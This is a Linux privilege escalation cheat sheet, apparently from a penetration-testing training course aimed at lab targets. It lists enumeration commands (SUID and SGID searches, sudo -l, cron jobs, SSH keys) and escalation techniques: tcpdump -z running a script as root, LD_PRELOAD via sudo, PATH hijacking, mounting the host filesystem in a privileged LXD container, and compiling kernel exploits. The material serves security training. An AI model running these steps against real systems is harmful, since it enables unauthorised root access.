Linux Privilege Escalation Module Cheat Sheet

Linux privilege escalation

Uploaded by

vuduchieu1611

LINUX PRIVILEGE ESCALATION

CHEAT SHEET
Command                                                                             Description

ssh htb-student@<target IP>                                                         SSH to lab target
ps aux | grep root                                                                  See processes running as root
ps au                                                                               See logged in users
ls /home                                                                            View user home directories
ls -l ~/.ssh                                                                        Check for SSH keys for current user
history                                                                             Check the current user's Bash history
sudo -l                                                                             Can the user run anything as another user?
ls -la /etc/cron.daily                                                              Check for daily Cron jobs
lsblk                                                                               Check for unmounted file systems/drives
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null                         Find world-writeable directories
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null                         Find world-writeable files
uname -a                                                                            Check the kernel version
cat /etc/lsb-release                                                                Check the OS version
gcc kernel_expoit.c -o kernel_expoit                                                Compile an exploit written in C
screen -v                                                                           Check the installed version of Screen
./pspy64 -pf -i 1000                                                                View running processes with pspy
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null                       Find binaries with the SUID bit set
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null                       Find binaries with the SETGID bit set
sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root   Priv esc with tcpdump
echo $PATH                                                                          Check the current user's PATH variable contents
PATH=.:${PATH}                                                                      Add a . to the beginning of the current user's PATH
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null                     Search for config files
ldd /bin/ls                                                                         View the shared objects required by a binary
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart                              Escalate privileges using LD_PRELOAD
readelf -d payroll | grep PATH                                                      Check the RUNPATH of a binary
gcc src.c -fPIC -shared -o /development/libshared.so                                Compile a shared library
lxd init                                                                            Start the LXD initialization process
lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine                    Import a local image
lxc init alpine r00t -c security.privileged=true                                    Start a privileged LXD container
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true        Mount the host file system in a container
lxc start r00t                                                                      Start the container
showmount -e 10.129.2.12                                                            Show the NFS export list
sudo mount -t nfs 10.129.2.12:/tmp /mnt                                             Mount an NFS share locally
tmux -S /shareds new -s debugsess                                                   Create a shared tmux session socket
./lynis audit system                                                                Perform a system audit with Lynis
